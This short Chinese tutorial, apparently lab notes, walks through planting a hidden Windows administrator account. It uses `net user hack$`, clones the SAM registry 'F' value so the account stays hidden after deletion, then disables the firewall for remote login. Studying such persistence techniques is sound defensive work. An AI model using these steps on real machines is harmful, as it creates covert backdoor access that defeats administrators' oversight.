1、查看本地用户
使用net user 查看本地存在administrator(管理员)、client(标准普通用户)、guest(访客)三个用户。
2、创建一个隐藏用户
使用net user <用户名> <密码> /add 创建新用户,删除是/delete
$符号代表隐藏,但只是命令界面隐藏
3、如果提示密码安全强度不够,在win+r>cmd>gpedit.msc>计算机配置>windows设置>安全设置>>账户策略->密码策略->密码必须符合复杂性要求 修改。
4、提升用户组
通过net localgroup administrators hack$ /add 命令将hack这个用户提升到admin管理用户组
通过net user查看,在用户管理工具中查看
这里并没有隐藏,这是因Windows 用户管理工具一般会显示所有已启用的用户,包括以特殊字符结尾的名称
5、操作注册表,实现隐藏用户
输入regedit进入注册表操作界面,找到LOCAL_MACHINE>SAM,右击SAM提升权限
完成后退出重进
6、找到admin和hack(用户和配置两个文件)的文件并导出,将hack的“F”内容复制到admin的文件中。
7、删除清理hack账号
用net user hack$ /delete 命令删除账号后在用户与组中查看可以看见已经删除
8、将修改好的注册表添加
双击导入
9、检查查看
删除hack用户之后,在计算机管理中看不见该用户,但是在注册表中可以看见hack用户,在命令中启动hack用户成功。隐藏用户设置成功
10、远程连接
通过另一台win7登录界面,远程连接注意要关掉防火墙,要添加远程访问用户